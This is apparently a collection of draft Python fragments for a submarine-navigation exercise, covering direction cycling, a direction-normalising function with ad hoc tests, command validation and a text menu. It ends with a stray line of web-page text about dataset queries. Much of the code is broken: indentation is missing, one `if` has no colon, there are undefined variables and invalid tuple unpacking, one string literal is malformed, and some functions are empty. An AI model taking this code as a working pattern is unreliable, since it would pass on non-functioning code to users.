def split(command):
return [char for char in command]
def movimento(command):
command = split(command)
for i in command:
if i == 'R':
x = x+1
print(x)
else:
print('no move')
command = 'rsa'
print(split(command))
command = split(command)
for char in command:
if i == 'r'
#############################################
def split(command):
return [char for char in command]
command = input()
command = split(command)
print(split(command))
list = ['L', 'R', 'R']
x=1
x, y, z = int(x), int(y), int(z), str(d_mov)
x, y, z, d_mov = 1, 2, 3, 'NORTE'
#############################################
def get_direction(Submarino):
def previous(direction_list, current_direction_position):
i = direction_list.index(current_direction_position)
return [direction_list[i - 1]]
print(previous(direction_list, 'NORTE'))
def next(direction_list, current_direction_position):
i = direction_list.index(current_direction_position)
return[direction_list[(i + 1) % len(direction_list)]]
print (next(direction_list, 'NORTE'))
#########################################################################
def direction_mov_condition(direction): # Essa função retorna o valor correspondente a direção do submarino
## 1 = NORTE
## 2 = LESTE
## 3 = SUL
## 4 = OESTE
direction = int(direction)
if direction <= 4:
direction
if direction >= 100:
direction = str(direction)
def split(direction):
return [char for char in direction]
direction_list = split(direction)
direction_list = direction_list[-2]+direction_list[-1]
direction = int(direction_list)
if direction > 4:
while direction > 4:
direction -= 4
else:
pass
if direction <= -100:
direction = str(direction)
def split(direction):
return [char for char in direction]
direction_list = split(direction)
direction_list = direction_list[0]+direction_list[-2]+direction_list[-1]
direction = int(direction_list)
if direction < 1:
while direction < 1:
direction += 4
else:
pass
return direction
def test_direction_mov_condition():
l = [1, 4, 10, 20, 99, 100, 123456789123456784, 0, -1, -10, -100, -12945678945614]
for i in l:
print(direction_mov_condition(i))
test_direction_mov_condition()
import time
def test_direction_mov_condition_with_range():
init_time = time.perf_counter()
for i in range (-10,10):
#print(i)
if direction_mov_condition(i) > 4:
print (f'Error! Out of range, {direction_mov_condition(i)}')
else:
print(direction_mov_condition(i))
final_time = time.perf_counter()
print(f'execution time of this test = {final_time-init_time}')
test_direction_mov_condition_with_range()
#########################################################################
# Comandos válidos
valid_commands = ['L','R','U','D','M']
commands = ['l','q']
for valid_command, command in valid_commands, commands:
if command != valid_command:
print('Please, input a valid command')
# command = input_command_string_parser()
print('Please, input a valid command /'L/' ')
def menu():
# 1. Create Submarine
# 2. Print initial position
# 3. Send a command
# 4. Print actual position
# 5. Reset submarine position
command_menu = input('''Choose an option and enter the number:
1. Create Submarine
2. Print current position
3. Send a command
4. Reset submarine position
''')
# if command_menu == 1:
# submarine = Submarino()
# print('Submarine succefuly created!')
# menu()
if command_menu == '1':
sub1 = create_submarine()
menu()
elif command_menu == '2':
return Submarino().get_current_position(), menu()
elif command_menu == '3':
command = input('Send a command: ')
command = send_command(command)
return command
elif command_menu == '4':
sub1 = create_submarine()
menu()
else:
print('Can\'t find this option, please follow next instructions')
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.